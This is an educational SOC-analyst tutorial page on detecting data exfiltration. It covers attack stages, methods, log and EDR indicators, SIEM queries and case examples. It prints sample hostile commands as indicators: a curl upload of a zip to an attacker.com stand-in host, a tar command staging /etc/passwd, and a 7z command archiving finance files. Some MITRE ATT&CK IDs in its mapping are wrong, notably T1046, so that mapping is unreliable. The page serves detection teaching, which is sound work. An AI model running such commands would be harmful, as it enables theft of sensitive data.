Home > SOC Analysis

Data Exfiltration

Data exfiltration is the unauthorized transfer of sensitive data from inside an organization to an external location controlled by an attacker.
It is one of the final and most critical stages of an intrusion, often following privilege escalation, credential theft, and lateral movement.
SOC analysts must detect exfiltration attempts early because once data leaves the network, impact becomes severe and often irreversible.

This chapter explains data exfiltration in full-scale SOC depth, including detection techniques, log analysis, network indicators, endpoint behaviors, protocols used for exfiltration, and practical detection strategies inside SIEM and EDR.

What Data Exfiltration Looks Like in Real Attacks

Attackers exfiltrate data through:

  • HTTP/HTTPS uploads

  • DNS tunneling

  • SMTP exfiltration

  • FTP/SFTP transfers

  • Cloud uploads (Dropbox, Google Drive, OneDrive)

  • TOR hidden services

  • C2 channels

  • Encrypted tunnels

  • Custom malware protocols

  • Public file-sharing sites

  • Slack/Telegram/Discord bots

Even normal protocols can hide malicious transfers if not analyzed carefully.

Data Exfiltration Stages

Stage 1 — Data Collection

Attacker accesses:

  • File servers

  • Databases

  • Shared drives

  • Email inboxes

  • Cloud storage

  • Business apps

Indicators include:

  • Unexpected access

  • Large volume reads

  • Access from unusual accounts

Stage 2 — Data Staging

Attackers prepare data to be sent out.

Staging locations:

  • %TEMP%

  • %APPDATA%

  • Desktop zip files

  • User profile folders

  • /tmp/

  • Hidden directories

Common staging behavior:

  • Creation of large ZIP/RAR files

  • Use of 7z.exe, rar.exe, zip.exe

  • File splitting (*.part01, *.part02)

  • Data encoding (Base64 files)

Example command spotted in logs:

7z.exe a C:\Users\Public\backup.zip C:\Finance\*.xlsx

Stage 3 — Exfiltration

Data is transferred externally.

Indicators include:

  • High outbound traffic

  • Connections to unfamiliar IPs

  • Unusual POST requests

  • Large DNS request sizes

  • FTP uploads

  • Cloud sync activity on servers

  • TOR usage

  • Continuous beaconing with large payloads

Example:

powershell.exe → upload via HTTPS to attacker domain

Common Methods Attackers Use for Data Exfiltration

1. HTTP/HTTPS Uploads

Most common. Attackers send data via POST requests to attacker-controlled domains.

Logs show:

  • Large POST bodies

  • Frequent POST requests

  • Unusual user agents

Example:

10MB POST request to sync-update-info.net/upload

2. DNS Tunneling

Data encoded inside DNS requests.

Indicators:

  • Long DNS queries

  • High frequency DNS traffic

  • Base32/Base64 patterns

  • DNS requests to unusual subdomains

Example:

ajdks7329sd9s9alsd.domain.com

3. Cloud Storage Abuse

Attackers use legitimate services.

Examples:

  • Dropbox

  • Google Drive

  • OneDrive

  • Mega

  • iCloud

Indicators:

  • Unusual cloud sync from servers

  • Large outbound to cloud IP ranges

4. Email Exfiltration

Attackers send data to external email accounts.

Indicators:

  • Large attachments

  • Emails from servers that normally don’t send mail

5. Encrypted Channels

Attackers use:

  • SSH

  • VPNs

  • Custom TLS tunnels

  • C2 frameworks (Cobalt Strike, Sliver)

Indicators:

  • Outbound encryption from unexpected hosts

6. File Transfer Protocols

  • FTP

  • SFTP

  • SCP

Indicators:

  • FTP on uncommon ports

  • Auth attempts from compromised accounts

7. Messaging Platforms

Exfiltration via:

  • Telegram bots

  • Slack webhooks

  • Discord API

Indicators:

  • Connections to messaging API endpoints

Detecting Data Exfiltration Using Logs

Windows Event Logs

Detect staging:

  • File creation in unusual directories

  • Archive creation

  • Large file modifications

  • Executions of compression tools

Example (Sysmon Process Create):

EventID 1 → 7z.exe creating backup.zip

Linux Audit Logs

Detect:

  • Tar/Gzip usage

  • SSH outbound

  • SCP uploads

  • Access to sensitive directories

Example:

tar -czf /tmp/data.tar.gz /etc/passwd

Detecting Data Exfiltration Using Network Logs

Firewalls / Proxy Logs

Look for:

  • Large outbound traffic

  • POST uploads

  • Unknown IPs

  • Suspicious user agents

  • Traffic outside business hours

Example:

500MB upload to 185.44.22.11

DNS Logs

Detect:

  • Large DNS packet sizes

  • Excessive queries

  • Encoded data patterns

Detecting Data Exfiltration With EDR

Indicators include:

  • Execution of compression tools

  • Powershell upload scripts

  • Curl/Wget commands

  • Encoded blobs

Example:

powershell.exe curl -F "file=@backup.zip" https://attacker.com/upload

EDR Behavioral Alerts

  • Suspicious network connections

  • Unusual process paths

  • Abnormal data transfers

  • Script engines initiating uploads

MITRE ATT&CK Mapping

Data Exfiltration techniques include:

  • T1041: Exfiltration over C2 channel

  • T1048: Exfiltration over alternative protocol

  • T1046: Exfiltration over web services

  • T1020: Automated exfiltration

  • T1567: Exfiltration to cloud storage

  • T1071: Application layer protocols

  • T1132: Data encoding

These mappings help detection engineers build accurate rules.

SIEM Detection Queries (Practical)

Detect Large Outbound Transfers

bytes_out > 50000000 AND dest NOT IN whitelist

Detect Suspicious POST Uploads

http.method=POST AND body_bytes > 2000000

Detect DNS Tunneling

dns.query_length > 60 OR count(dns.requests) > threshold

Detect File Compression Tools Usage

process_name IN ("7z.exe", "rar.exe", "zip.exe")

Detect Cloud Storage Access From Servers

dest_domain IN (dropbox.com, drive.google.com) AND host_category = "server"

Real SOC Case Examples

Example 1 — Ransomware Gang Exfiltration

EDR shows:

7z.exe → backup.7z → outbound HTTPS to 91.22.113.10

Firewall confirms 1.2GB upload.

Example 2 — Insider Exfiltration

Proxy logs:

POST to WeTransfer with 300MB file

User had no business need.

Example 3 — DNS Tunneling Malware

DNS logs show:

  • 10k+ DNS requests

  • Long encoded subdomain names

Investigation revealed backdoor.

Example 4 — Cloud Abuse on Linux Server

Outbound:

AWS S3 upload from finance server at 3AM

Confirmed compromise.

Intel Dump

  • Data exfiltration is the unauthorized external transfer of sensitive data.

  • Attackers stage data using compression tools and hidden directories.

  • Exfiltration methods include HTTP uploads, DNS tunneling, FTP/SFTP, email, cloud storage, TOR, and encrypted tunnels.

  • Detect using Windows/Linux logs, EDR telemetry, firewall logs, proxy, and DNS analysis.

  • Key indicators include large outbound traffic, unusual POST requests, long DNS queries, cloud uploads from servers, compression tool usage, and encoded PowerShell commands.

  • SIEM rules must detect abnormal data volumes, suspicious protocols, cloud access anomalies, and staging behavior.

HOME COMMUNITY CAREERS DASHBOARD